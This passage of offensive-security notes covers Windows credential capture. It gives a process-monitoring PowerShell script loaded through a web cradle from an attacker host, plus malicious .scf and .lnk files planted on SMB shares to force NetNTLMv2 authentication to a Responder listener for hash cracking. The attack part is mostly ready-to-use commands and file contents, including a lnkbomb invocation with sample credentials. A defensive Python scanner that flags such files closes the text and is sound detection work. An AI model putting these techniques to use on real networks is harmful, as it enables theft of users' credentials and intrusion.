See Relay Potato too
## Monitor processes

Windows has a lot of options to pass credentials straight on the command line, so diffing the process list every second can catch them. Save this PowerShell script as procmon.ps1, then either run it directly on the target:

```powershell
while($true)
{
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
```

or use a web cradle. The script is on our attacker machine, so we open an HTTP server there:

```shell
python3 -m http.server 80
```

and load it on the target:

```powershell
IEX (iwr 'http://10.10.14.44/procmon.ps1')
```

## File share
We can place malicious files on a file share, then wait for anyone to browse through there or click on them. This makes a callback to our SMB server, and we get a NetNTLMv2 hash to crack.
### SMB scf file upload

Doesn't work after Windows Server 2019.

Start a Responder listener on the current network interface:

```shell
sudo responder -I tun0
```

hashcat's mode for NetNTLMv2 is 5600.

Upload @Report.scf onto the target's SMB share. Whoever accesses the folder you uploaded @Report.scf to will be hit. The IP here is the attacker's IP:

```ini
[Shell]
Command=2
IconFile=\\10.10.14.17\share\test.ico
[Taskbar]
Command=ToggleDesktop
```

### SMB lnk file upload
#### lnkbomb

```shell
git clone https://github.com/dievus/lnkbomb.git
cd lnkbomb
python -m venv .venv
source .venv/bin/activate
pip install -r ./requirements.txt
```

-t is the target IP, -a the attacker IP, -n the NetBIOS name of the target machine:

```shell
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
```

#### PowerShell way (annoying)

```powershell
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
```
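From the defensive side, here is an added Python example (not part of these notes, nor lnkbomb's code) that scans a share for the two artifacts above: .scf files whose IconFile= is a UNC path, and .lnk files whose embedded UTF-16LE strings carry a UNC path, flagging any host not on an allow list. The trusted host names and the sample inputs are assumptions constructed for the example.

```python
import configparser
import re
from pathlib import Path

# UNC path at the start of an SCF IconFile= value: \\host\share\...
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# The same \\host\ pattern as it appears UTF-16LE encoded inside a binary .lnk
LNK_UNC_RE = re.compile(rb"\\\x00\\\x00((?:[^\x00\\]\x00)+)\\\x00")


def scf_icon_host(text):
    """Return the host named by IconFile= in an SCF file, or None if local/unparseable."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None  # not a valid INI file, so not an SCF trigger
    icon = cp.get("Shell", "IconFile", fallback="").strip()
    m = UNC_RE.match(icon)
    return m.group(1) if m else None


def lnk_unc_hosts(data):
    """Return every host referenced by a UNC path inside raw .lnk bytes."""
    return [m.group(1).decode("utf-16-le") for m in LNK_UNC_RE.finditer(data)]


def untrusted(hosts, trusted_hosts):
    """Keep only hosts that are not on the (assumed) allow list, case-insensitively."""
    allow = {h.lower() for h in trusted_hosts}
    return [h for h in hosts if h.lower() not in allow]


def scan_share(root, trusted_hosts):
    """Walk a share and list files whose icon/target points at an untrusted host."""
    findings = []
    for path in Path(root).rglob("*"):
        suffix = path.suffix.lower()
        if suffix == ".scf":
            host = scf_icon_host(path.read_text(errors="replace"))
            hosts = untrusted([host] if host else [], trusted_hosts)
        elif suffix == ".lnk":
            hosts = untrusted(lnk_unc_hosts(path.read_bytes()), trusted_hosts)
        else:
            continue
        if hosts:
            findings.append((str(path), hosts))
    return findings
```

Run `scan_share(r"\\fileserver01\Shared", ["fileserver01"])` from a host with read access to the share; every hit names the file and the foreign host it would authenticate to.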